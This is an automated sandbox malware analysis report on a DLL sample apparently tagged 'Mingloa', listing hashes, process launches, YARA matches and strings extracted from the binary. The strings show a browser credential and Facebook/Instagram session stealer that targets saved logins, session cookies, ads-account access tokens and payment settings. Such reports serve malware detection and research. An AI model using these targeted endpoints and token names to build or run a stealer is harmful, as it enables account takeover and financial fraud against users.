Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report A8xYhQFvXo

Overview

General Information

Sample Name:A8xYhQFvXo (renamed file extension from none to dll)
Analysis ID:346331
MD5:83dd317c95f4acb8623d1f024945cfdb
SHA1:04f9227cc3bfde5626be669be106a5d38f4416b1
SHA256:5b2f060f1512100a0d500312fa579cdad9d3ea101778838173aa7215cd39700a
Tags:Mingloa

Most interesting Screenshot:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
One or more processes crash
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6628 cmdline: loaddll32.exe 'C:\Users\user\Desktop\A8xYhQFvXo.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • rundll32.exe (PID: 6652 cmdline: rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6896 cmdline: rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6972 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 712 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7004 cmdline: rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 712 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
A8xYhQFvXo.dllAPT34_PICKPOCKETunknownunknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.236067014.000000001028B000.00000008.00020000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x1556d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000007.00000002.245505715.000000001028B000.00000008.00020000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x1556d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x1556d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E

Unpacked PEs

SourceRuleDescriptionAuthorStrings
1.2.rundll32.exe.10000000.1.unpackAPT34_PICKPOCKETunknownunknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data
4.2.rundll32.exe.10000000.1.unpackAPT34_PICKPOCKETunknownunknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data
7.2.rundll32.exe.10000000.1.unpackAPT34_PICKPOCKETunknownunknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: A8xYhQFvXo.dllVirustotal: Detection: 17%Perma Link
Source: A8xYhQFvXo.dllMetadefender: Detection: 18%Perma Link
Source: A8xYhQFvXo.dllReversingLabs: Detection: 44%
Machine Learning detection for sampleShow sources
Source: A8xYhQFvXo.dllJoe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: A8xYhQFvXo.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Binary contains paths to debug symbolsShow sources
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10147900 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,1_2_10147900
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10145A40 FindFirstFileA,FindClose,1_2_10145A40
Source: A8xYhQFvXo.dllString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: A8xYhQFvXo.dllString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://ocsp.digicert.com0I
